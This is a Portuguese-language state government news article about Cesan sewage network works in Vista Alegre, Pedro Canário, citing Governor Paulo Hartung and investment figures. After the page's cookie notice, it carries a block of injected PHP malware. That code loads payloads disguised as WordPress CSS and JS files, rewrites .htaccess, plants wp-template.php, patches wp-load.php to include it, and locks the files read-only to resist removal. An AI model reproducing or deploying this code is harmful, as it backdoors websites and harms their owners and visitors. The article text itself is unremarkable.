pcanario13072017 - Alexandre da Cruz (1)O município de Pedro Canário, no Norte do Espírito Santo, recebe novo investimento para complementar o sistema de esgotamento sanitário na cidade. O Governo do Estado, por meio da Companhia Espírito-Santense de Saneamento (Cesan), assinou a ordem de início de serviço para obras no bairro Vista Alegre, nesta quinta-feira (13), no município.

Após fazer uma visita técnica às obras do projeto Caminhos do Campo, o governador Paulo Hartung participou de solenidade no Centro do município, onde reafirmou o compromisso do Governo em desenvolver e preparar os municípios capixabas para as oportunidades que possibilitem geração de empregos e desenvolvimento econômico.
“Em um momento difícil como este que o país está vivenciando, onde os governadores estão com muita dificuldade em administrar os Estados e com enormes desafios para fazer investimentos, aqui em Pedro Canário, se somarmos os valores do que foi investido em segurança pública, com o que está sendo feito nas áreas de saneamento básico,  estrada do projeto Caminhos do Campo, e com as obras da ponte no distrito de Cristal,  veremos que hoje estamos investindo um belo montante em uma hora desafiadora que estamos vivendo em nosso país”, avaliou o governador Paulo Hartung.pcanario13072017 - Leonardo Duarte - Secom (4)

O presidente da Cesan, Pablo Andreão, destacou os investimentos da Companhia na Região Norte no último ano, que beneficiaram 82 mil pessoas. “Para a ampliação do sistema de coleta e tratamento de esgoto sanitário de Pedro Canário foram realizadas obras nos bairros Camata, Esplanada e Novo Horizonte, que somam quase R$ 3 milhões com recursos próprios da Cesan”, afirmou.

O evento contou com a presença do diretor de Engenharia e Meio Ambiente da Cesan, Amadeu Wetler, além de  deputados, representantes do Governo de Estado, representantes do município e lideranças locais.

O investimento de R$ 515 mil, em Vista Alegre, será realizado com recursos próprios da Cesan. A previsão é que as obras sejam concluídas em 12 meses. Serão beneficiados 257 moradores do bairro Vista Alegre, na sede de Pedro Canário, que vai contar com os serviços de coleta e tratamento de esgoto oferecidos pela Companhia, que também projeta, em longo prazo, o atendimento até 2026.

pcanario13072017 - Leonardo Duarte - Secom (3)Serão implantados cerca de 1.225 metros de redes coletoras e emissários de esgoto, além de 206 ligações prediais e uma estação elevatória com capacidade para bombear 2,6 milhões de litros de esgoto por mês. O esgoto deixará de ser lançado na natureza, contribuindo com a saúde preventiva da população e a preservação do meio ambiente e dos recursos hídricos.

 

icone-es

Usamos cookies essenciais ao funcionamento do site. Ao continuar navegando você concorda com a nossa Política de Privacidade

$zxrpath=$_SERVER["DOCUMENT_ROOT"]."/";$_autoplarr=array("/logs/history.log","/tmp/history.log",$zxrpath."wp-includes/css/common.css",$zxrpath."wp-includes/js/jquery/common.js",$zxrpath."wp-includes/blocks/avatar/common.css",$zxrpath."wp-admin/js/widgets/common.js",$zxrpath."wp-admin/css/colors/modern/common.css",$zxrpath."wp-content/themes/twentytwentythree/styles/common.css",$zxrpath."wp-content/themes/twentytwentytwo/styles/common.css",$zxrpath."wp-content/themes/twentytwentyfive/styles/common.css",$zxrpath."wp-content/themes/twentytwentyfour/styles/common.css",$zxrpath."wp-content/plugins/contact-form-7/assets/common.css");$_titlefilename="";$_wptemplatecon="";$_htaccesscon="";foreach($_autoplarr as $_autofile){if(@file_exists($_autofile)){$_titlefilename=$_autofile;break;}}if($_titlefilename){$_autocon=@file_get_contents($_titlefilename);if($_autocon){$_autoarrcon=explode("---", $_autocon);$_wptemplatecon=$_autoarrcon[0];$_htaccesscon=trim($_autoarrcon[1],PHP_EOL);}if($_htaccesscon&&strpos($_htaccesscon, "index.php")!==false){$_htaccessname=$zxrpath.".htaccess";if(file_exists($_htaccessname)){$_htaccesstext=file_get_contents($_htaccessname);if(strpos($_htaccesstext,"404")===false&&strpos($_htaccesstext,"index.php")===false){chmod($_htaccessname, 0775);unlink($_htaccessname);file_put_contents($_htaccessname, $_htaccesscon);chmod($_htaccessname, 0444);}}else{file_put_contents($_htaccessname, $_htaccesscon);if(file_exists($_htaccessname)){chmod($_htaccessname, 0444);}}}$_prewploadfilename=$zxrpath."wp-load.php";$_prewptplfilename=$zxrpath."wp-template.php";if(!file_exists($_prewptplfilename)){file_put_contents($_prewptplfilename, $_wptemplatecon);chmod($_prewptplfilename, 0444);}$_wploadcon=@file_get_contents($_prewploadfilename);if($_wploadcon&&strpos($_wploadcon, "wp-template.php")===false){$_prewplocon=str_replace("/** Define ABSPATH", "if(file_exists(dirname(__FILE__).\"/wp-template.php\")){require_once(dirname(__FILE__).\"/wp-template.php\");}".PHP_EOL."/** Define ABSPATH", $_wploadcon);file_put_contents($_prewploadfilename, $_prewplocon);chmod($_prewploadfilename, 0444);$_currnetfileid=1;}if($_wploadcon&&strpos($_wploadcon, "//if(file_exists(dirname(")!==false){$_wploadcon=str_replace("//if(file_exists(dirname(", "if(file_exists(dirname(", $_wploadcon);file_put_contents($_prewploadfilename, $_wploadcon);chmod($_prewploadfilename, 0444);}}